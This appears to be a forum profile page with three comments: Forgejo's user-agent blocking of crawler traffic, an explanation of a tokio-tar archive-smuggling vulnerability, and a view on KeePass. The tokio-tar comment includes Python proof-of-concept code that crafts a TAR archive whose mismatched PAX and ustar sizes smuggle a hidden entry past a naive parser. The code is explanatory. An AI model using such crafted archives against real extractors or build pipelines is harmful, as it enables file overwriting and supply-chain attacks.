• 4 Posts
  • 42 Comments
Joined 3 years ago
Cake day: June 11th, 2023


  • Six months ago, distributed crawling hit code.forgejo.org. The mitigation put in place then, a JavaScript-based proof-of-work challenge, held until a few weeks ago, when the crawling software learned to solve the challenge and the attack returned.

    Since November 24, a new blocking strategy has been in place, blocking around one million unique IPs daily. Only about 5,000 unique IP addresses reach code.forgejo.org per day, and no reports of legitimate traffic being blocked have been received.

    Crazy. A 1M to 5k ratio.

    The linked ‘new strategy’ writeup is interesting too. They’re blocking a specific user agent.

    TL;DR: on 26 November, ~900,000 unique IPs sent requests to code.forgejo.org, and blocking one user agent effectively blocks over 90% of them. At the moment ~50,000 unique IPs hit code.forgejo.org per hour; ~5,000 of them are not using the suspicious user agent and are sent to Anubis, and ~1,000 of those pass the challenge and reach code.forgejo.org.

    && Header(`user-agent`, `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36`)
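    That rule (Traefik `Header` matcher syntax) is just an exact match on the User-Agent string. In pseudo-middleware form it amounts to the sketch below; the `route` function and its return labels are hypothetical illustrations, not Traefik's or Forgejo's actual API:

    ```python
    # Hypothetical sketch of the routing rule above; the function and the
    # return labels are illustrative, not Traefik's or Forgejo's API.
    BLOCKED_UA = (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/125.0.0.0 Safari/537.36"
    )

    def route(headers):
        """Decide what happens to a request based on its User-Agent."""
        if headers.get("user-agent", "") == BLOCKED_UA:
            return "blocked"           # the one UA behind ~90% of crawler IPs
        return "anubis-challenge"      # everyone else faces proof-of-work first

    print(route({"user-agent": BLOCKED_UA}))   # blocked
    print(route({"user-agent": "curl/8.5"}))   # anubis-challenge
    ```

    An exact-match on a full UA string is cheap and, per the numbers above, catches the bulk of the botnet; the remaining traffic still has to clear Anubis.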
    
  • What is the vulnerability, what is the attack vector, and how does it work? Here’s the technical context from the linked source, Edera:

    This vulnerability is a desynchronization flaw that allows an attacker to “smuggle” additional archive entries into TAR extractions. It occurs when processing nested TAR files that exhibit a specific mismatch between their PAX extended headers and ustar headers.

    The flaw stems from the parser’s inconsistent logic when determining file data boundaries:

    1. A file entry has both PAX and ustar headers.
    2. The PAX header correctly specifies the actual file size (size=X, e.g., 1MB).
    3. The ustar header incorrectly specifies zero size (size=0).
    4. The vulnerable tokio-tar parser incorrectly advances the stream position based on the ustar size (0 bytes) instead of the PAX size (X bytes).

    By advancing 0 bytes, the parser fails to skip over the actual file data (which is a nested TAR archive) and immediately encounters the next valid TAR header located at the start of the nested archive. It then incorrectly interprets the inner archive’s headers as legitimate entries belonging to the outer archive.

    This leads to:

    • File overwriting attacks within extraction directories.
    • Supply chain attacks via build system and package manager exploitation.
    • Bill-of-materials (BOM) bypass for security scanning.
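    The desync in steps 1–4 can be demonstrated with hand-rolled tar blocks. This is a minimal sketch, not tokio-tar’s actual code: `naive_entries` is a deliberately broken walk that trusts only the ustar size field, mimicking the flaw described above.

    ```python
    # Sketch of the PAX/ustar size desynchronization. All blocks are
    # hand-built for illustration; names like "evil.txt" are made up.
    BLOCK = 512

    def ustar_header(name, size, typeflag=b"0"):
        """Build one 512-byte ustar header with the given size field."""
        buf = bytearray(BLOCK)
        buf[0:len(name)] = name.encode()
        buf[100:108] = b"0000644\x00"                       # mode
        buf[108:116] = b"0000000\x00"                       # uid
        buf[116:124] = b"0000000\x00"                       # gid
        buf[124:136] = ("%011o" % size).encode() + b"\x00"  # size, octal
        buf[136:148] = b"00000000000\x00"                   # mtime
        buf[148:156] = b"        "                          # checksum: spaces while summing
        buf[156:157] = typeflag
        buf[257:265] = b"ustar\x0000"                       # magic + version
        buf[148:156] = ("%06o" % sum(buf)).encode() + b"\x00 "
        return bytes(buf)

    def pad(data):
        rem = len(data) % BLOCK
        return data + b"\x00" * ((BLOCK - rem) % BLOCK)

    # The nested archive: one smuggled entry (1024 bytes total).
    inner = ustar_header("evil.txt", 4) + pad(b"pwn\n")

    # Step 2: the PAX header states the real data size of the outer entry.
    pax_record = b"13 size=1024\n"                          # length-prefixed PAX record
    pax = ustar_header("payload.tar", len(pax_record), typeflag=b"x") + pad(pax_record)

    # Step 3: the ustar header lies and claims size=0.
    outer = ustar_header("payload.tar", 0)

    archive = pax + outer + inner + b"\x00" * (2 * BLOCK)

    def naive_entries(blob):
        """Vulnerable walk: trusts only the ustar size field (step 4)."""
        names, off = [], 0
        while off + BLOCK <= len(blob):
            hdr = blob[off : off + BLOCK]
            if hdr == b"\x00" * BLOCK:
                break
            name = hdr[0:100].rstrip(b"\x00").decode()
            size = int(hdr[124:136].rstrip(b"\x00 "), 8)
            off += BLOCK + -(-size // BLOCK) * BLOCK        # skip header + data blocks
            if hdr[156:157] != b"x":                        # PAX size override ignored!
                names.append(name)
        return names

    # Advancing 0 bytes past "payload.tar", the parser mistakes the nested
    # archive's header for a second top-level entry:
    print(naive_entries(archive))   # ['payload.tar', 'evil.txt']
    ```

    A correct parser would honor the PAX `size=1024` override, skip the nested archive’s bytes as file data, and report only `payload.tar`.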


  • I deliberately chose KeePass, with no browser extension and none of the cloud services other password managers and services provide, to reduce risk.

    Web browsers are deeply interconnected tech with non-obvious relationships and risks. Having my browser access my password database feels inherently uncomfortable.

    Browsers’ built-in password managers with optional sync do have the benefit that auto-fill is only offered on the matching domain. But I’d never store my critical passwords in them.

    Having to launch a separate password manager, enter a long master key, and then copy-paste or trigger auto-type from it is cumbersome, but it’s the only way to get a reasonably robust separation.